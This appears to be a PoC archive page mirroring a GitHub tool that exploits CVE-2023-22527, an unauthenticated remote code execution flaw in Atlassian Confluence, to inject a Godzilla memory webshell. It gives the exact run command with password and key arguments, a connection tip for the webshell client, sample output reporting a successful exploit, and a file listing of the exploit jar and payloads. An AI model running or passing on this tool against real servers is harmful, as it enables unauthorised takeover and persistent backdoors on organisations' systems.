Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-22527 PoC — Atlassian Confluence 安全漏洞

Source
https://github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL
Associated Vulnerability
Title:Atlassian Confluence 安全漏洞 (CVE-2023-22527)
Description:Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。 Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在模板注入漏洞,允许未经身份验证的攻击者在受影响的实例上实现远程代码执行。
Description
CVE-2023-22527 内存马注入工具
Readme
# CVE-2023-22527-Godzilla-MEMSHELL

## Usage

**ps: 测试版本为:8.5.1,其他版本肯定也可以,但没有测试**

```
内容参考北辰师傅之前的工具

java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar url 哥斯拉密码 哥斯拉密钥

example
        java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://xxxx/  pass key

```

如果内存Shell已经注入成功但哥斯拉无法连接,请在请求配置添加以下协议头或者为哥斯拉配置Burp代理
```
Connection: close
```

```

$ java -jar .\CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://127.0.0.1:8090/ qaxnb key
[*] Exploit url: http://127.0.0.1:8090/template/aui/text-inline.vm
Response Code: 200
Response Code: 200
[*] send payload
Validate Response Code: 200
[*] exploit success
[*] godzilla webshell password : qaxnb
[*] godzilla webshell key : key

```

![img.png](img.png)
File Snapshot

 [4.0K]  /data/pocs/f3aab0d999d80c7ec2b2427df701957470bf5108
├── [ 500]  CVE-2023-22527-Godzilla-MEMSHELL-main.iml
├── [ 21K]  img.png
├── [4.0K]  libs
│   └── [832K]  javassist-3.28.0-GA.jar
├── [4.0K]  out
│   ├── [4.0K]  artifacts
│   │   └── [4.0K]  CVE_2023_22527_Godzilla_MEMSHELL_main_jar
│   │       └── [841K]  CVE-2023-22527-Godzilla-MEMSHELL-main.jar
│   └── [4.0K]  production
│       └── [4.0K]  CVE-2023-22527-Godzilla-MEMSHELL-main
│           ├── [4.0K]  main
│           │   ├── [8.0K]  ConfluenceFilterMemshell.class
│           │   ├── [ 193]  initpayload.txt
│           │   ├── [ 135]  label.txt
│           │   ├── [6.4K]  Main.class
│           │   ├── [ 600]  MiTM$1.class
│           │   ├── [2.8K]  MiTM.class
│           │   └── [ 213]  poc.txt
│           └── [4.0K]  META-INF
│               └── [  45]  MANIFEST.MF
├── [ 876]  README.md
└── [4.0K]  src
    ├── [4.0K]  main
    │   ├── [8.0K]  ConfluenceFilterMemshell.java
    │   ├── [ 193]  initpayload.txt
    │   ├── [ 135]  label.txt
    │   ├── [4.7K]  Main.java
    │   ├── [2.6K]  MiTM.java
    │   └── [ 213]  poc.txt
    └── [4.0K]  META-INF
        └── [  45]  MANIFEST.MF

11 directories, 20 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.